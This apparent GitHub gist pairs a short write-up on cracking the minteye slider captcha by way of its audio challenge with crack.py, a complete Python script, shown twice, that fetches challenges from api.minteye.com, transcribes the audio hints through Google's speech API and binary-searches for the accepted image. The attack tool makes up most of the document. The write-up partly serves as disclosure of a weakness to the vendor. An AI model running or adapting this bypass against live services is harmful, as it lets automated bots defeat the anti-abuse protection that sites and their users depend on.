Samuirai/captcha_minteye.md

## captcha_minteye.md

      
    Raw
  

              captcha_minteye.md
            
          
    minteye is a captcha system where you try to find the original image out of distorted ones.
They also have a feature list on their website but they forgot the view from a computer. I fixed it:

There are two ways to crack this captcha easily. I've used the audio challenge. There are three different kinds of audio messages:

1. move the slider to the right
2. move the slider to the left
3. slider is in the correct position

Messages 1 and 2 are very long sentences and 3 is a very short sentence. I've used Google Chrome's speech-to-text API to convert the audio into text. The text I get back is mostly nonsense, but it recognizes "left" and "right", which is sufficient to determine the next move of the slider. Here is a small video which shows the code in action:
YouTube Video Demo
minteye should have a look at how reCaptcha obscures the audio. But the problem will always be the small amount of different messages.
kind regards,

samuirai
personal Website http://www.smrrd.de

I'm a member of the Stuttgart Hackerspace - shackspace
edit:
to see really cool stuff with reCaptcha, check out what they did: http://www.dc949.org/projects/stiltwalker/

  
## crack.py
import httplib, re, urllib2, json, subprocess, StringIO, Tkinter, ImageTk, traceback
from PIL import Image

# Directory prefix for the intermediate .wav/.flac files written by audio2text.
tmp_folder = 'tmp/'
# File-name prefix for those files; initiate() uses it to select what to clear.
file_prefix = 'test_'

class Logger():
    """Minimal level-filtered console logger.

    A message is printed only when its level does not exceed the level the
    logger was created with, so ``Logger(0)`` stays silent for the default
    message level of 1.
    """

    def __init__(self,level=0):
        """Store the verbosity threshold (a higher value prints more)."""
        self.level = level

    def log(self,level=1,msg=''):
        """Print ``msg`` prefixed with ``[level]`` when ``level`` is within the threshold."""
        if self.level>=level:
            # Single-argument parenthesised form: prints the same text with the
            # Python 2 print statement and the Python 3 print function.
            print('[%d] %s' % (level,msg))

class MinteyeCaptcha:
    """Client for the minteye slider-captcha HTTP endpoints on api.minteye.com.

    Typical use: create an instance, call ``initiate()`` once to obtain a
    challenge id and a session id, then call ``getimg``/``getaudio`` for a
    slider position and pass the audio to ``audio2text``.
    """

    def __init__(self,CaptchaId='4025',PublicKey='8fce9e8a-dc61-4b04-b2a4-61e9ded571a2',Dummy='random_dummy',DEBUG=0):
        """Remember the captcha parameters and create the API connection object.

        CaptchaId, PublicKey and Dummy are strings that are concatenated into
        the request URLs; DEBUG is the verbosity level handed to ``Logger``.
        """
        self.CaptchaId = CaptchaId
        self.PublicKey = PublicKey
        self.Dummy = Dummy
        self.logging = Logger(DEBUG)
        self.apiconn = httplib.HTTPConnection('api.minteye.com')
        self.logging.log(1,'created MintEye id: '+CaptchaId)
        # Both are filled in by initiate().
        self.SessionId = None
        self.cid = None

    def initiate(self):
        """Request a new challenge and store its id and the session id.

        Also requests the slider data for the challenge and removes temporary
        files left over from an earlier run.

        Raises IndexError when the challenge id or session id cannot be found
        in the response, and KeyError when no ``set-cookie`` header is present.
        """
        # Local imports: these modules are not part of the file-level import line.
        import glob
        import os

        self.apiconn.request('GET','/Get.aspx?CaptchaId='+self.CaptchaId+'&PublicKey='+self.PublicKey+'&Dummy='+self.Dummy)
        req = self.apiconn.getresponse()

        content = req.read()
        self.cid = re.findall(r'.*Challenge: \'([a-z0-9\-]+)\',.*',content)[0]
        self.logging.log(1,'cid: '+self.cid)

        headers = req.getheaders()
        self.SessionId = re.findall(r'.*ASP.NET_SessionId=([a-z0-9]+);.*',dict(headers)['set-cookie'])[0]
        self.logging.log(1,'SessionId: '+self.SessionId)

        self.apiconn.request('GET','/Slider/SliderData.ashx?cid='+self.cid+'&CaptchaId='+self.CaptchaId+'&PublicKey='+self.PublicKey+'&w=300&h=250&callback=jQuery16208220419886056334_1355770229700&_=1355770230436')
        req = self.apiconn.getresponse()
        # The body is not used, but it must be consumed before the connection
        # can carry the next request.
        req.read()

        self.logging.log(1,'clear tmp dir')
        # Expand the wildcard here: an argument list given to subprocess is not
        # passed through a shell, so 'rm tmp/test_*' would look for a file that
        # is literally named 'test_*'.
        try:
            if not os.path.isdir(tmp_folder):
                os.makedirs(tmp_folder)
        except OSError:
            self.logging.log(2,'ERROR: could not create '+tmp_folder)
        for stale in glob.glob(tmp_folder+file_prefix+'*'):
            try:
                os.remove(stale)
            except OSError:
                self.logging.log(2,'ERROR: could not remove '+stale)

    def getaudio(self,val=0):
        """Return the raw audio bytes of the spoken hint for slider position ``val``.

        Requires ``initiate()`` to have set ``cid`` and ``SessionId``.
        Overwrites ``self.Dummy`` with a fixed value.
        """
        self.logging.log(1,'get audio: '+str(val))
        self.Dummy = '1234567'
        # request() is (method, url, body, headers): the cookie must be given as
        # a headers mapping, otherwise the string ends up as the request body.
        headers = {'Cookie': 'ASP.NET_SessionId='+self.SessionId}
        self.apiconn.request('GET','/Slider/Speak.ashx?cid='+self.cid+'&val='+str(val)+'&dumm='+self.Dummy,headers=headers)
        req = self.apiconn.getresponse()
        content = req.read()
        return content

    def getimg(self,val=0):
        """Return the raw image bytes for slider position ``val``."""
        self.logging.log(1,'get image: '+str(val))
        # NOTE(review): CaptchaId is hard-coded to 42 here instead of using
        # self.CaptchaId - confirm whether that is intentional.
        req = urllib2.urlopen('http://api.minteye.com/slider/image.ashx?CaptchaId=42&PublicKey='+self.PublicKey+'&w=300&h=250&dumm='+self.Dummy+'&reqid='+self.cid+'&img='+str(val))
        content = req.read()
        return content


    def audio2text(self,audio,val=0):
        """Transcribe ``audio`` and return the recognised text, or None on failure.

        The bytes are written to a .wav file, converted to .flac by running
        ffmpeg, and posted to the Google speech recognition URL.  ``val`` only
        selects the names of the temporary files.  A failure in any stage is
        logged at level 2 and ends the call with None.
        """
        wav_path = tmp_folder+file_prefix+str(val)+'.wav'
        flac_path = tmp_folder+file_prefix+str(val)+'.flac'

        try:
            self.logging.log(1,'create .wav file')
            with open(wav_path,'wb') as f:
                f.write(audio)
        except Exception:
            self.logging.log(2,'ERROR: create .wav file')
            traceback.print_exc()
            return None

        try:
            self.logging.log(1,'convert audio .wav to .flac')
            subprocess.call(["ffmpeg", "-i", wav_path, flac_path,'-loglevel','quiet','-y'])
            # A failed conversion shows up here as a missing .flac file.
            with open(flac_path,'rb') as f:
                audio = f.read()
        except Exception:
            self.logging.log(2,'ERROR: convert audio .wav to .flac')
            return None

        try:
            self.logging.log(1,'audio2text via google')
            url = "https://www.google.com/speech-api/v1/recognize?xjerr=1&client=chromium&lang=en-US"
            request = urllib2.Request(url)
            request.add_header('Content-type','audio/x-flac; rate=8000')
            request.add_header('Content-length', str(len(audio)))
            request.add_data(audio)
            response = urllib2.urlopen(request)
            content = json.loads(response.read())
            return content['hypotheses'][0]['utterance']
        except Exception:
            self.logging.log(2,'ERROR: audio2text via google')
            return None


# Fetch a challenge and session first; the window is created afterwards.
cracker = MinteyeCaptcha(DEBUG=2)
cracker.initiate()

# Search state shared with the <space> key handler.
found = False
binary_search = [0,29]

# Window with a single label that displays the image being probed.
root = Tkinter.Tk()
image = tkpi = None
label_image = Tkinter.Label(root)
label_image.pack()

def next_image(event):
    """Probe the midpoint of the current search range; bound to the <space> key.

    Shows the image for the midpoint index, transcribes its audio hint and
    narrows ``binary_search`` (inclusive [low, high]) according to whether the
    first 50 characters of the transcript contain "left" or "right".  A
    transcript of at most 50 characters is taken as the short "correct
    position" message and sets ``found``.  ``event`` is the Tk event object
    and is not used.
    """
    global found, tkpi, image
    low, high = binary_search
    if low > high:
        print("error? search range is empty (%d,%d)" % (low, high))
        return
    val = low + (high - low) // 2
    print("===== binary search try Image #%d (%d,%d) =====" % (val, low, high))

    root.title('Image #'+str(val))
    img = cracker.getimg(val)
    image = Image.open(StringIO.StringIO(img))
    root.geometry('%dx%d' % (image.size[0],image.size[1]))
    # Keep references (module globals and on the label) so the PhotoImage is
    # not garbage-collected while it is displayed.
    tkpi = ImageTk.PhotoImage(image)
    label_image.configure(image = tkpi)
    label_image.image = tkpi
    audio = cracker.getaudio(val)
    text = cracker.audio2text(audio, val)
    root.update()
    if text is None:
        # audio2text returns None when any of its stages failed.
        print("error? no transcript for Image #%d" % val)
        return
    print("\nGoogle says:\n%s\n" % text)
    if len(text)>50:
        # val itself was just rejected, so exclude it from the new range;
        # keeping it as a bound lets the floor midpoint stall below the
        # upper index.
        if "left" in text[0:50]:
            binary_search[1] = val - 1
        elif "right" in text[0:50]:
            binary_search[0] = val + 1
        else:
            print("error?")
    else:
        print("\nFound valid Picture #"+str(val))
        found = True

# Position the window at offset (300, 250), run next_image on every <space>
# key press, and enter the Tk event loop.
window_offset = (300,250)
root.geometry('+%d+%d' % window_offset)
root.bind("<space>", next_image)
root.mainloop()
	import httplib, re, urllib2, json, subprocess, StringIO, Tkinter, ImageTk, traceback
	from PIL import Image

	# Directory prefix for the intermediate .wav/.flac files written by audio2text.
	tmp_folder = 'tmp/'
	# File-name prefix for those files; initiate() uses it to select what to clear.
	file_prefix = 'test_'

	class Logger():
		"""Minimal level-filtered console logger.

		A message is printed only when its level does not exceed the level the
		logger was created with, so ``Logger(0)`` stays silent for the default
		message level of 1.
		"""

		def __init__(self,level=0):
			"""Store the verbosity threshold (a higher value prints more)."""
			self.level = level

		def log(self,level=1,msg=''):
			"""Print ``msg`` prefixed with ``[level]`` when ``level`` is within the threshold."""
			if self.level>=level:
				# Single-argument parenthesised form: prints the same text with the
				# Python 2 print statement and the Python 3 print function.
				print('[%d] %s' % (level,msg))

	class MinteyeCaptcha:
		"""Client for the minteye slider-captcha HTTP endpoints on api.minteye.com.

		Typical use: create an instance, call ``initiate()`` once to obtain a
		challenge id and a session id, then call ``getimg``/``getaudio`` for a
		slider position and pass the audio to ``audio2text``.
		"""

		def __init__(self,CaptchaId='4025',PublicKey='8fce9e8a-dc61-4b04-b2a4-61e9ded571a2',Dummy='random_dummy',DEBUG=0):
			"""Remember the captcha parameters and create the API connection object.

			CaptchaId, PublicKey and Dummy are strings that are concatenated into
			the request URLs; DEBUG is the verbosity level handed to ``Logger``.
			"""
			self.CaptchaId = CaptchaId
			self.PublicKey = PublicKey
			self.Dummy = Dummy
			self.logging = Logger(DEBUG)
			self.apiconn = httplib.HTTPConnection('api.minteye.com')
			self.logging.log(1,'created MintEye id: '+CaptchaId)
			# Both are filled in by initiate().
			self.SessionId = None
			self.cid = None

		def initiate(self):
			"""Request a new challenge and store its id and the session id.

			Also requests the slider data for the challenge and removes temporary
			files left over from an earlier run.

			Raises IndexError when the challenge id or session id cannot be found
			in the response, and KeyError when no ``set-cookie`` header is present.
			"""
			# Local imports: these modules are not part of the file-level import line.
			import glob
			import os

			self.apiconn.request('GET','/Get.aspx?CaptchaId='+self.CaptchaId+'&PublicKey='+self.PublicKey+'&Dummy='+self.Dummy)
			req = self.apiconn.getresponse()

			content = req.read()
			# '.*' restored on both sides: a bare '.' demands one character
			# before the keyword and fails when the keyword starts the string.
			self.cid = re.findall(r'.*Challenge: \'([a-z0-9\-]+)\',.*',content)[0]
			self.logging.log(1,'cid: '+self.cid)

			headers = req.getheaders()
			self.SessionId = re.findall(r'.*ASP.NET_SessionId=([a-z0-9]+);.*',dict(headers)['set-cookie'])[0]
			self.logging.log(1,'SessionId: '+self.SessionId)

			self.apiconn.request('GET','/Slider/SliderData.ashx?cid='+self.cid+'&CaptchaId='+self.CaptchaId+'&PublicKey='+self.PublicKey+'&w=300&h=250&callback=jQuery16208220419886056334_1355770229700&_=1355770230436')
			req = self.apiconn.getresponse()
			# The body is not used, but it must be consumed before the connection
			# can carry the next request.
			req.read()

			self.logging.log(1,'clear tmp dir')
			# Expand the wildcard here: an argument list given to subprocess is not
			# passed through a shell, so 'rm tmp/test_*' would look for a file that
			# is literally named 'test_*'.
			try:
				if not os.path.isdir(tmp_folder):
					os.makedirs(tmp_folder)
			except OSError:
				self.logging.log(2,'ERROR: could not create '+tmp_folder)
			for stale in glob.glob(tmp_folder+file_prefix+'*'):
				try:
					os.remove(stale)
				except OSError:
					self.logging.log(2,'ERROR: could not remove '+stale)

		def getaudio(self,val=0):
			"""Return the raw audio bytes of the spoken hint for slider position ``val``.

			Requires ``initiate()`` to have set ``cid`` and ``SessionId``.
			Overwrites ``self.Dummy`` with a fixed value.
			"""
			self.logging.log(1,'get audio: '+str(val))
			self.Dummy = '1234567'
			# request() is (method, url, body, headers): the cookie must be given as
			# a headers mapping, otherwise the string ends up as the request body.
			headers = {'Cookie': 'ASP.NET_SessionId='+self.SessionId}
			self.apiconn.request('GET','/Slider/Speak.ashx?cid='+self.cid+'&val='+str(val)+'&dumm='+self.Dummy,headers=headers)
			req = self.apiconn.getresponse()
			content = req.read()
			return content

		def getimg(self,val=0):
			"""Return the raw image bytes for slider position ``val``."""
			self.logging.log(1,'get image: '+str(val))
			# NOTE(review): CaptchaId is hard-coded to 42 here instead of using
			# self.CaptchaId - confirm whether that is intentional.
			req = urllib2.urlopen('http://api.minteye.com/slider/image.ashx?CaptchaId=42&PublicKey='+self.PublicKey+'&w=300&h=250&dumm='+self.Dummy+'&reqid='+self.cid+'&img='+str(val))
			content = req.read()
			return content


		def audio2text(self,audio,val=0):
			"""Transcribe ``audio`` and return the recognised text, or None on failure.

			The bytes are written to a .wav file, converted to .flac by running
			ffmpeg, and posted to the Google speech recognition URL.  ``val`` only
			selects the names of the temporary files.  A failure in any stage is
			logged at level 2 and ends the call with None.
			"""
			wav_path = tmp_folder+file_prefix+str(val)+'.wav'
			flac_path = tmp_folder+file_prefix+str(val)+'.flac'

			try:
				self.logging.log(1,'create .wav file')
				with open(wav_path,'wb') as f:
					f.write(audio)
			except Exception:
				self.logging.log(2,'ERROR: create .wav file')
				traceback.print_exc()
				return None

			try:
				self.logging.log(1,'convert audio .wav to .flac')
				subprocess.call(["ffmpeg", "-i", wav_path, flac_path,'-loglevel','quiet','-y'])
				# A failed conversion shows up here as a missing .flac file.
				with open(flac_path,'rb') as f:
					audio = f.read()
			except Exception:
				self.logging.log(2,'ERROR: convert audio .wav to .flac')
				return None

			try:
				self.logging.log(1,'audio2text via google')
				url = "https://www.google.com/speech-api/v1/recognize?xjerr=1&client=chromium&lang=en-US"
				request = urllib2.Request(url)
				request.add_header('Content-type','audio/x-flac; rate=8000')
				request.add_header('Content-length', str(len(audio)))
				request.add_data(audio)
				response = urllib2.urlopen(request)
				content = json.loads(response.read())
				return content['hypotheses'][0]['utterance']
			except Exception:
				self.logging.log(2,'ERROR: audio2text via google')
				return None



	# Fetch a challenge and session first; the window is created afterwards.
	cracker = MinteyeCaptcha(DEBUG=2)
	cracker.initiate()

	# Search state shared with the <space> key handler.
	found = False
	binary_search = [0,29]

	# Window with a single label that displays the image being probed.
	root = Tkinter.Tk()
	image = tkpi = None
	label_image = Tkinter.Label(root)
	label_image.pack()

	def next_image(event):
		"""Probe the midpoint of the current search range; bound to the <space> key.

		Shows the image for the midpoint index, transcribes its audio hint and
		narrows ``binary_search`` (inclusive [low, high]) according to whether the
		first 50 characters of the transcript contain "left" or "right".  A
		transcript of at most 50 characters is taken as the short "correct
		position" message and sets ``found``.  ``event`` is the Tk event object
		and is not used.
		"""
		global found, tkpi, image
		low, high = binary_search
		if low > high:
			print("error? search range is empty (%d,%d)" % (low, high))
			return
		val = low + (high - low) // 2
		print("===== binary search try Image #%d (%d,%d) =====" % (val, low, high))

		root.title('Image #'+str(val))
		img = cracker.getimg(val)
		image = Image.open(StringIO.StringIO(img))
		root.geometry('%dx%d' % (image.size[0],image.size[1]))
		# Keep references (module globals and on the label) so the PhotoImage is
		# not garbage-collected while it is displayed.
		tkpi = ImageTk.PhotoImage(image)
		label_image.configure(image = tkpi)
		label_image.image = tkpi
		audio = cracker.getaudio(val)
		text = cracker.audio2text(audio, val)
		root.update()
		if text is None:
			# audio2text returns None when any of its stages failed.
			print("error? no transcript for Image #%d" % val)
			return
		print("\nGoogle says:\n%s\n" % text)
		if len(text)>50:
			# val itself was just rejected, so exclude it from the new range;
			# keeping it as a bound lets the floor midpoint stall below the
			# upper index.
			if "left" in text[0:50]:
				binary_search[1] = val - 1
			elif "right" in text[0:50]:
				binary_search[0] = val + 1
			else:
				print("error?")
		else:
			print("\nFound valid Picture #"+str(val))
			found = True

	# Position the window at offset (300, 250), run next_image on every <space>
	# key press, and enter the Tk event loop.
	window_offset = (300,250)
	root.geometry('+%d+%d' % window_offset)
	root.bind("<space>", next_image)
	root.mainloop()